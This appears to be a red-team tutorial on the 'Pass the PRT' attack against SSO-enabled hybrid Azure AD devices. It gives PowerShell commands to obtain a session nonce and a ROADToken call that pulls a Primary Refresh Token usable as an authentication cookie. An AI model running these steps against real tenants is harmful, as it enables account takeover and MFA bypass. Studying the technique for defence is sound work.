Pass the PRT
This attack exploits devices with SSO enabled in hybrid Azure environments. PRTs can authenticate into any application, bypass MFA with the built-in MFA claim and satisfy every conditional access policy.
This attack leverages the native presence of the BrowserCore
extension on devices with SSO enabled, this extension allows to generate and sign a PRT but requires a session nonce so the attacker can initialize a SSO session to obtain the initial nonce and then pipe the requests to the extension to get the full PRT out of it.
To perform the attack we'll use an awesome tool called ROADtoken but Mimikatz can be used as well. Checking if SSO is enabled on a host is a simple as using
Dsregcmd.exe /status
The AzureAdPrt
and AzureAdJoined
fields should both be set to YES
.
If the host satisfies these conditions we can go ahead and request a session nonce
PS /home/otter> $tenantId = "<tenant_id>"
PS /home/otter> $url = "https://login.microsoftonline.com/$TenantId/oauth2/token"
PS /home/otter> $params = @{
>> "URI" = $url
>> "Method" = "POST"
>> }
PS /home/otter> $body = @{
>> "grant_type" = "srv_challenge"
>> }
PS /home/otter> $result = Invoke-RestMethod $params -UseBasicParsing -Body $body
PS /home/otter> $result.Nonce
With the nonce value we can request an actual PRT
PS /home/otter> .\ROADToken.exe "<nonce>"
this will return a JSON object with a x-ms-RefreshTokenCredential
field that can be used as a cookie to authenticate.
As mentioned, this attack can also be pulled off with Mimikatz, the process is longer but it allows to get a better overview of how the tokens are created by the browser extension.
To know more about the process i suggest reading this post.